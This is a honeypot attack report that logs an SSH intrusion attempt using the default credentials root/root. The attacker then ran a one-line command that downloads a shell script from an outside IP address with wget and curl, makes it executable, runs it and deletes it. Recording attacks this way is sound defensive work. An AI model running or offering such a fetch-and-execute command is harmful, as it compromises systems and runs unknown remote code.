Attack Report for Observation

Header

Time

2024/08/27, 08:28:19 (GMT)

Transaction ID

H7KTN9582BZYYNMX

Service

ssh

Location

US (United States)

Attacker

174.138.36.202

Classification

Web script execution

Harm Potential

High

Description

Script execution method downloaded from the www (web)

Content

174.138.36.202 client username 'root' and password 'root' entered
174.138.36.202 client command : 'wget http://159.253.120.29/8UsA.sh; curl -O http://159.253.120.29/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; rm -rf 8UsA.sh'

All observations are coming from honeypot central database.

Please share your wishes, opinions and suggestions with us:

If you like, you can support
with your donations to us..

Donate